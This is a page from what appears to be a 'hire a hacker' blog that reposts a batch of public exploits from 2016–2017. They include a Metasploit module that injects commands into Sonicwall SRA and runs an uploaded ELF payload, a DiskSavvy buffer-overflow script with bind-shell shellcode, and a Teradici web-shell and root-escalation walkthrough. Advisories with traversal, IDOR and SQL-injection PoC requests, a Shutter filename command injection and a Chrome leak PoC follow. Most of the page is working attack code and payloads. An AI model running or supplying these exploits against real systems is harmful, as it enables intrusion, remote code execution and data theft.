Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863153224

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Sonicwall viewcert.cgi CGI Remote Command Injection Vulnerablity 
# Date: 12/24/2016
# Exploit Author: xort @ Critical Start
# Vendor Homepage: www.sonicwall.com
# Software Link: sonicwall.com/products/sra-virtual-appliance
# Version: 8.1.0.2-14sv
# Tested on: 8.1.0.2-14sv
#             
# CVE : (awaiting cve)

# vuln: viewcert.cgi / CERT parameter 

# Description PostAuth Sonicwall SRA <= v8.1.0.2-14sv. This exploit leverages a command injection bug. 
#
# xort @ Critical Start




require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = ExcellentRanking
	include  Exploit::Remote::Tcp
        include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Sonicwall SRA <= v8.1.0.2-14sv viewcert.cgi remote exploit',
					'Description'    => %q{
					This module exploits a remote command execution vulnerability in
				the Sonicwall SRA Appliance Version <=  v8.1.0.2-14sv. The vulnerability exist in
				a section of the machine's adminstrative infertface for performing configurations 
				related to on-connect scripts to be launched for users's connecting.	
			},
			'Author'         =>
				[
					'xort@Critical Start', # vuln + metasploit module
				],
			'Version'        => '$Revision: 1 $',
			'References'     =>
				[
					[ 'none', 'none'],
				],
			'Platform'      => [ 'linux'],
			'Privileged'     => true,
			 'Arch'          => [ ARCH_X86 ],
                        'SessionTypes'  => [ 'shell' ],
                        'Privileged'     => false,

		        'Payload'        =>
                                { 
                                  'Compat' =>
                                  {
                                        'ConnectionType' => 'find',
                                  }
                                },

			'Targets'        =>
				[
					['Linux Universal',
						{
								'Arch' => ARCH_X86,
								'Platform' => 'linux'
						}
					],
				],
			'DefaultTarget' => 0))

			register_options(
				[
					OptString.new('PASSWORD', [ false, 'Device password', "" ]),	
			         	OptString.new('USERNAME', [ true, 'Device password', "admin" ]),	
					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
					Opt::RPORT(443),
				], self.class)
	end

        def do_login(username, password_clear)
                vprint_status( "Logging into machine with credentials...\n" )

                # vars
                timeout = 1550;

                # send request  
                res = send_request_cgi(
                {
                      'method'  => 'POST',
                      'uri'     => "/cgi-bin/userLogin",
		      'headers' => {
			   'Connection' => 'close',
			   'Content-Type' => 'application/x-www-form-urlencoded',
			   'User-Agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0',
	              },
                      'vars_post' => {
			   'username' => username,
			   'password' => password_clear,
			   'domain' => 'LocalDomain',
			   'loginButton' => 'Login',
			   'state' => 'login',
			   'login' => 'true',
			   'VerifyCert' => '0',
			   'portalname' => 'VirtualOffice',
			   'ajax' => 'true'
		       },
                }, timeout)

		swap = res.headers['Set-Cookie'].split('\n').grep(/(.*)swap=([^;]+);/){$2}[0]
		
                return swap
        end


	def run_command(swap_cookie, cmd)

                # vars
                timeout = 1550;

                res = send_request_cgi({
                   'method' => 'POST',
                   'uri'    => "/cgi-bin/viewcert",
                   'data' => "buttontype=delete&CERT=newcert-1`#{cmd}`",
                   'headers' =>
                        {
                                'Cookie' => "swap=#{swap_cookie}",
                        },
                }, timeout)
	end

	def run_command_spliced(swap_cookie, cmd)

              write_mode = ">"
              dump_file = "/tmp/qq"
	      reqs = 0

              cmd_encoded = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')

              for cmd_chunk in cmd_encoded.split(/(....................................)/)

                        cmd_new = "printf \"#{cmd_chunk}\"#{write_mode}#{dump_file}"
			reqs += 1

			vprint_status("Running Command (#{reqs})\n")

                        # set to normal append for loops after the first round
                        if write_mode == ">"
                                write_mode = ">>"
                        end

                        # add cmd to array to be exected later          
                        run_command(swap_cookie, cmd_new)
               end
#		vprint_status("Running Final Command ...\n")

                # execute payload stored at dump_file 
                run_command(swap_cookie, "chmod +x /tmp/qq; sh /tmp/qq")

	end

	def exploit
		# timeout
		timeout = 1550;

		# params
		password_clear = datastore['PASSWORD']
		user = datastore['USERNAME']

		# do authentication		
		swap_cookie = do_login(user, password_clear)
	
		vprint_status("authenticated 'swap' cookie: #{swap_cookie}\n")
			
		 #if no 'CMD' string - add code for root shell
                if not datastore['CMD'].nil? and not datastore['CMD'].empty?

                        cmd = datastore['CMD']

                        # Encode cmd payload
                        encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')

                        # kill stale calls to bdump from previous exploit calls for re-use
                        run_command(swap_cookie, ("sudo /bin/rm -f /tmp/n; printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n; /tmp/n" ))

                else
                        # Encode payload to ELF file for deployment
                        elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
                        encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')


                        run_command_spliced(swap_cookie, "printf \"#{encoded_elf}\">/tmp/m;chmod +rx /tmp/m;/tmp/m")
			# wait for magic
                        handler
                end
	end
end
HireHackking 
Document Title:
===============
Lock Photos Album&Videos Safe v4.3 - Directory Traversal Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2032


Release Date:
=============
2017-02-21


Vulnerability Laboratory ID (VL-ID):
====================================
2032


Common Vulnerability Scoring System:
====================================
7.8


Product & Service Introduction:
===============================
You can lock and manage your private photos, videos, text messages, voice recordings, notes, documents and other files very easily! You can store 
and view PDF, Text(can be created and edited), PowerPoint, Word, Excel, Html, Pages, Key, Numbers and play music very simply! You can as well do 
more things in one app and manage your life better!

(Copy of the Homepage: https://itunes.apple.com/us/app/lock-photos-album-video.s/id448033053 )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote directory traversal vulnerability in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2017-02-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Galaxy Studio (Mo Wellin)
Product: Lock Photos Album & Videos Safe - iOS Mobile (Web-Application) 4.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A directory traversal vulnerability has been dsicovered in the official Galaxy Studio Lock Photos Album & Videos Safe v4.3 iOS mobile application.
The security vulnerability allows an attackers to unauthorized request and download local application files by usage of manipulated path parameters.

The directory traversal web vulnerability is located in the `PRE` parameter of the wifi web-server interface. Remote attackers are able to request 
the local web-server during the sharing process to access unauthenticated application files. Attackers are able to request via form action path 
variables to access, download or upload arbitrary files. Remote attackers are able to access the sql-lite database file that own the web-server 
access credentials of the application. After the download the attacker is able to access the database management system file to use the credentials 
for unauthorized access via protocol. The PRE request with the action form variable allows to inject any path of the local file system without check 
for privileges or user access rights. Thus allows an attacker to bypass the local path restriction to compromise the mobile ios web-server application.
The request method to inject is GET and the attack vector is located on the client-side of the web-server web-application. Finally an attacker is able 
to access with the credentials the service by using a client via http protocol.

The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.8. 
Exploitation of the web vulnerability requires no privilege web-application user account or user interaction. Successful exploitation of the 
vulnerability results in information leaking, mobile application compromise by unauthorized and unauthenticated access.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] PRE

Vulnerable Parameter(s):
[+] form action

Affected Module(s):
[+] Web-Server File System


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Standard Request:
http://localhost:5555/?PRE=action form


PoC: Payload
//..//..//..//..//..//..//..//..//%00
/../../../../../../../../%00


PoC: Exploitation
http://localhost:5555/?PRE=action form=/../../../../../../../../%00


PoC: Exploit
use strict;
use LWP::UserAgent;
my $b = LWP::UserAgent->new();
my $host = "localhost:5555";
print $b->get("http://".$host."/?PRE=action form=/../../../../../../../../%00")->content;


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:5555/?PRE=action%20form=//..//..//..//..//..//..//..//..//%00 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:5555]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Date[Di., 21 Feb. 2017 09:21:48 GMT]
      Accept-Ranges[bytes]
      Content-Length[0]




PoC: Vulnerable Source
{
  "paths" : [
    "/Picture/Public/path/All Image/"
  ],
  "folder" : "/Picture/Public/path",
  "code" : 1
}
... manipulated

{
  "paths" : [
  ],
  "folder" : "/../../../../../../../../%00",
  "code" : 1
}


Reference(s):
http://localhost:5555/
http://localhost:5555/?PRE


Solution - Fix & Patch:
=======================
The security vulnerability can be resolved by disallowing users to access the upper path for root privileges. Ensure that the form 
action request denies to access web-server data or application configuration files. Parse and restrict the form action parameter to 
prevent further directory traversal attacks.


Security Risk:
==============
The security risk of the directory traversal web vulnerability in the mobile web-server application is estimated as high. (CVSS 7.8)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]
HireHackking 
Document Title:
===============
ProjectSend r754 - IDOR & Authentication Bypass Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2031


Release Date:
=============
2017-02-21


Vulnerability Laboratory ID (VL-ID):
====================================
2031


Common Vulnerability Scoring System:
====================================
5.3


Product & Service Introduction:
===============================
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets 
you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending 
on external services or e-mail to send those files.

(Copy of the Homepage: http://www.projectsend.org/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the ProjectSend-r754 web-application.


Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
GNU GPL License
Product: ProjectSend r754


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An insecure direct object references occured in case of an application provides direct access to objects based on user-supplied input. 
As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure Direct Object References 
allows attackers to bypass authorization and access resources directly by modifying the value of a parameter[client] used. Thus finally point 
to other client account names, which allows an attackers to download others clients private data with no secure method provided.

Vulnerability Method(s):
[+] GET

Vulnerable Module(s):
[+] process.php?do=zip_download

Vulnerable Parameter(s):
[+] client
[+] file


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required ...

2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension  

--- PoC Session Logs ---
GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/ProjectSend-r754/my_files/
Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
Connection: keep-alive
-
HTTP/1.1 200 OK
Date: Sun, 05 Feb 2017 19:07:41 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.44-0+deb7u1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 6

Name of Files: .jpg


Video PoC:
https://www.youtube.com/watch?v=Xc6Jg9I7Pj4


Security Risk:
==============
The security risk of the web vulnerability in the ProjectSend-r754 web-application function is estimated as medium. (CVSS 5.3)


Credits & Authors:
==================
Lawrence Amer - Vulnerability Laboratory [Research Team] - (http://lawrenceamer.me) (https://www.vulnerability-lab.com/show.php?user=Lawrence Amer)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.

				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]
HireHackking 
# Exploit Title: Teradici Management Console 2.2.0 - Web Shell Upload and Privilege Escalation
# Date: February 22nd, 2017
# Exploit Author: hantwister
# Vendor Homepage: http://www.teradici.com/products-and-solutions/pcoip-products/management-console
# Software Link: https://techsupport.teradici.com/ics/support/DLRedirect.asp?fileID=63583 (login required)
# Version: 2.2.0


Users that can access the Settings > Database Management page can achieve code
execution as root on older versions of PCoIP MC 2.x. (Based on CentOS 7 x64)


Web Shell Upload Vulnerability Overview
---------------------------------------

Database archives are extracted under /opt/jetty/tmpdeploy. By creating a
malicious archive with a malicious web script that extracts to the known
directory /opt/jetty/tmpdeploy/jetty-0.0.0.0-8080-console.war-_console-any-
it is possible to add or modify class files and XML files pertaining to the
application.


Privilege Escalation Vulnerability Overview
-------------------------------------------

The jetty user owns the file /opt/jetty/jetty_self_restart.sh, and the same user
has sudo rights to run that file without a password. By manipulating this file,
arbitrary code can be run as root.


Exploiting The Vulnerabilities
------------------------------

alice:~$ mkdir -p runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~$ cd runasroot
alice:~/runasroot$ msfvenom (snip) > evil
alice:~/runasroot$ chmod a+x evil
alice:~/runasroot$ nano modify_self_restart.sh

#!/bin/bash
echo /tmp/evil >> /opt/jetty/jetty_self_restart.sh

alice:~/runasroot$ chmod a+x modify_self_restart.sh
alice:~/runasroot$ cd jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images
alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ nano runasroot.gsp

<html>
<head>
<title>runasroot</title>
</head>
<body>
<pre>
<% out << "cp /opt/jetty/tmpdeploy/evil /tmp/".execute().text %>
<% out << "/opt/jetty/tmpdeploy/modify_self_restart.sh".execute().text %>
<% out << "sudo /opt/jetty/jetty_self_restart.sh".execute().text %>
</pre>
</body>
</html>

alice:~/runasroot/jetty-0.0.0.0-8080-console.war-_console-any-/webapp/images$ cd ../../..
alice:~/runasroot$ tar -zcf runasroot.tar.gz evil modify_self_restart.sh jetty-0.0.0.0-8080-console.war-_console-any-
alice:~/runasroot$ openssl enc -e -aes-256-cbc -salt -in runasroot.tar.gz -out runasroot.archive -pass pass:4400Dominion -p

Now, choose to upload runasroot.archive through the Database Management page. An
error will be displayed that it wasn't a valid archive. Now, navigate to
https://IP/console/images/runasroot.gsp
HireHackking 
# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://wpcore.com/plugin/mail-masta
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]


Mail-Masta SQL Injection

Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)

GET Parameter: list_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php


csvexport.php:

$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);


Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)

GET Parameter: filter_list

http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1


view-list.php:

global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));


Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)

POST Parameter: camp_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php


count_of_send.php:

include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from  $masta_reports where camp_id=$camp_id and status=1");


Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)

POST Parameter: list_id

campaign_save.php:

$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");


POST /wp-admin/admin-ajax.php?id= HTTP/1.1

...snip...

action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
HireHackking 
# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters 
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64

# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php

import socket
import sys

try:
    host = sys.argv[1]
    os = sys.argv[2]
    port = 80
except IndexError:
    print "[+] Usage %s <host>  win7/win10" % sys.argv[0]
    print "[i] Example: dsavvy.py localhost win10"
    sys.exit()


# 355 bytes bind shell, PORT 4444,  bad chars \x09\x0a\x0d\x20
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")

crash = "\x41" * 2487
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
filler = "\x44" * (2505-334-300-100)
nseh = "\xeb\x08\x90\x90"
stack_fill="\x41"*100
nops="\x90"*8
egg = "t00wt00w"

if os == "win7":
  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x33\xd2" 
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xef\xb8" 
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")

elif os == "win10":
  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")

else:
  print "[!] This windows version is not supported yet"
  exit(0)

exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops  + shell + filler

buffer = "GET /"+exploit+" HTTP/1.1\r\n"
buffer+= "Host: "+host+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://"+host+"/login\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
HireHackking 
# Exploit Title: Shutter user-assisted remote code execution
# Date: 2016-12-26
# Software Link: http://shutter-project.org/
# Version: 0.93.1
# Tested on: Ubuntu,  Debian
# Exploit Author: Prajith P
# Website: http://prajith.in/
# Author Mail: me@prajith.in
# CVE: CVE-2016-10081

1. Description.
   /usr/bin/shutter in Shutter through 0.93.1 allows user-assisted remote
attackers to execute arbitrary commands via a crafted image name that is
mishandled during a "Run a plugin" action.

2. Proof of concept.
   1) Rename an image to something like "$(firefox)"
   2) Open the renamed file in shutter
   3) Click the "Run a plugin" option and select any plugin from the list and click "Run"

3. Solution:
  https://bugs.launchpad.net/shutter/+bug/1652600


Thanks,
Prajithh
HireHackking 
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024

Chrome bug:

https://bugs.chromium.org/p/chromium/issues/detail?id=671328

PoC:
-->

<style>
content { contain: size layout; }
</style>
<script>
function leak() {
 document.execCommand("selectAll"); 
 opt.text = ""; 
}
</script>
<body onload=leak()>
<content>
<select>
<option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option>
</select>
</content>

<!--
Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass.
-->
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component Store for K2 v3.8.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_k2store
# Date: 23.02.2017
# Vendor Homepage: http://jworkplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/extension-specific/k2-extensions/store-for-k2/
# Demo: http://k2store.jworkplace.com/
# Version: 3.8.2
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Joomla! Component UserExtranet v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_userextranet
# Date: 23.02.2017
# Vendor Homepage: http://www.beesto.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/access-a-security/site-access/userextranet/
# Demo: http://www.beesto.com/extensions/18-userextranet/93-demo
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php?option=com_userextranet&view=folders&fid=[SQL]
